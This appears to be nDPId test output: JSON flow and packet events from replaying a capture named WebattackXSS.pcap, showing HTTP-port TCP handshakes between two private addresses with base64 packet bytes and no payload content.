+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7148,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347825732,"flow_last_seen":1499347825732,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347825732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33096,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7148,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":506,"flow_packet_id":1,"flow_last_seen":1499347825732,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347825732,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Tq1AAD4GdyOsEAABwKgKMoFIAFDgbWNwAAAAAKACchBqdAAAAgQFtAQCCAoBPC3dAAAAAAEDAwc="} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7149,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":506,"flow_packet_id":2,"flow_last_seen":1499347825732,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347825732,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgUjyJE\/d4G1jcaAScSAmGQAAAgQFtAQCCAoD5f9SATwt3QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7150,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":506,"flow_packet_id":3,"flow_last_seen":1499347825733,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347825733,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Tq5AAD4GdyqsEAABwKgKMoFIAFDgbWNx8iRP3oAQAOXFHwAAAQEICgE8Ld4D5f9S"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7166,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347828369,"flow_last_seen":1499347828369,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347828369,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33122,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7166,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":507,"flow_packet_id":1,"flow_last_seen":1499347828369,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347828369,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QFxAAD4GhXSsEAABwKgKMoFiAFAwDnAtAAAAAKACchALaQAAAgQFtAQCCAoBPDBxAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7167,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":507,"flow_packet_id":2,"flow_last_seen":1499347828369,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347828369,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgWKuqhlpMA5wLqAScSA+aQAAAgQFtAQCCAoD5gHlATwwcQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7168,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":507,"flow_packet_id":3,"flow_last_seen":1499347828369,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347828369,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0QF1AAD4GhXusEAABwKgKMoFiAFAwDnAurqoZaoAQAOXdcAAAAQEICgE8MHED5gHl"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7179,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347829667,"flow_last_seen":1499347829667,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347829667,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7179,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":508,"flow_packet_id":1,"flow_last_seen":1499347829667,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347829667,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8lVZAAD4GMHqsEAABwKgKMoFwAFBnlqTjAAAAAKACchCd2AAAAgQFtAQCCAoBPDG1AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7180,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":508,"flow_packet_id":2,"flow_last_seen":1499347829667,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347829667,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgXAvgGqdZ5ak5KAScSD9iQAAAgQFtAQCCAoD5gMqATwxtQEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7181,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":508,"flow_packet_id":3,"flow_last_seen":1499347829668,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347829668,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0lVdAAD4GMIGsEAABwKgKMoFwAFBnlqTkL4BqnoAQAOWckAAAAQEICgE8MbYD5gMq"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7200,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347832201,"flow_last_seen":1499347832201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347832201,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33162,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7200,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":509,"flow_packet_id":1,"flow_last_seen":1499347832201,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347832201,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Dq9AAD4GtyGsEAABwKgKMoGKAFARZDqAAAAAAKACchBb2gAAAgQFtAQCCAoBPDQvAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7201,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":509,"flow_packet_id":2,"flow_last_seen":1499347832202,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347832202,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgYqpulj1EWQ6gaAScSBQgAAAAgQFtAQCCAoD5gWjATw0LwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7202,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":509,"flow_packet_id":3,"flow_last_seen":1499347832202,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347832202,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DrBAAD4GtyisEAABwKgKMoGKAFARZDqBqbpY9oAQAOXvhwAAAQEICgE8NC8D5gWj"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7209,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347833462,"flow_last_seen":1499347833462,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833462,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33176,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7209,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":510,"flow_packet_id":1,"flow_last_seen":1499347833462,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347833462,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8H+JAAD4Gpe6sEAABwKgKMoGYAFAzOSqIAAAAAKACchBItAAAAgQFtAQCCAoBPDVqAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7210,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":510,"flow_packet_id":2,"flow_last_seen":1499347833462,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347833462,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgZimBogRMzkqiaAScSAQtwAAAgQFtAQCCAoD5gbeATw1agEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":510,"flow_packet_id":3,"flow_last_seen":1499347833462,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347833462,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0H+NAAD4GpfWsEAABwKgKMoGYAFAzOSqJpgaIEoAQAOWvvgAAAQEICgE8NWoD5gbe"} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347698449,"flow_last_seen":1499347703808,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59974,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347698449,"flow_last_seen":1499347703808,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59974,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347699724,"flow_last_seen":1499347704808,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59988,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347699724,"flow_last_seen":1499347704808,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347702287,"flow_last_seen":1499347707810,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60014,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347702287,"flow_last_seen":1499347707810,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60014,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347703726,"flow_last_seen":1499347708810,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60028,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347703726,"flow_last_seen":1499347708810,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60028,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347705116,"flow_last_seen":1499347710811,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60042,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347705116,"flow_last_seen":1499347710811,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60042,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347706399,"flow_last_seen":1499347711812,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60056,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347706399,"flow_last_seen":1499347711812,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60056,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7230,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347836095,"flow_last_seen":1499347836095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347836095,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7230,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":511,"flow_packet_id":1,"flow_last_seen":1499347836095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347836095,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Z2FAAD4GXm+sEAABwKgKMoGyAFBvhFCdAAAAAKACchDjpwAAAgQFtAQCCAoBPDf8AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":511,"flow_packet_id":2,"flow_last_seen":1499347836095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347836095,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgbKB84w4b4RQnqAScSDJAwAAAgQFtAQCCAoD5glxATw3\/AEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7232,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":511,"flow_packet_id":3,"flow_last_seen":1499347836096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347836096,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Z2JAAD4GXnasEAABwKgKMoGyAFBvhFCegfOMOYAQAOVoCgAAAQEICgE8N\/0D5glx"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7239,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347837373,"flow_last_seen":1499347837373,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347837373,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33216,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7239,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":512,"flow_packet_id":1,"flow_last_seen":1499347837373,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347837373,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8zIRAAD4G+UusEAABwKgKMoHAAFDQoPW4AAAAAKACchDcIQAAAgQFtAQCCAoBPDk8AAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7240,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":512,"flow_packet_id":2,"flow_last_seen":1499347837373,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347837373,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgcDH48pN0KD1uaAScSA8OQAAAgQFtAQCCAoD5gqwATw5PAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7241,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":512,"flow_packet_id":3,"flow_last_seen":1499347837374,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347837374,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0zIVAAD4G+VKsEAABwKgKMoHAAFDQoPW5x+PKToAQAOXbQAAAAQEICgE8OTwD5gqw"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7251,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347838675,"flow_last_seen":1499347838675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347838675,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33230,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7251,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":513,"flow_packet_id":1,"flow_last_seen":1499347838675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347838675,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8apJAAD4GWz6sEAABwKgKMoHOAFDGglATAAAAAKACchCKkgAAAgQFtAQCCAoBPDqBAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7252,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":513,"flow_packet_id":2,"flow_last_seen":1499347838675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347838675,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgc48YB01xoJQFKAScSAiAAAAAgQFtAQCCAoD5gv2ATw6gQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7254,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":513,"flow_packet_id":3,"flow_last_seen":1499347838676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347838676,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0apNAAD4GW0WsEAABwKgKMoHOAFDGglAUPGAdNoAQAOXBBgAAAQEICgE8OoID5gv2"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7269,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347841229,"flow_last_seen":1499347841229,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347841229,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33256,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7269,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":514,"flow_packet_id":1,"flow_last_seen":1499347841229,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347841229,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86g5AAD4G28GsEAABwKgKMoHoAFBN49cOAAAAAKACchB5nQAAAgQFtAQCCAoBPD0AAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7270,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":514,"flow_packet_id":2,"flow_last_seen":1499347841229,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347841229,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgejkRPOpTePXD6AScSCQMwAAAgQFtAQCCAoD5g50ATw9AAEDAwc="} 
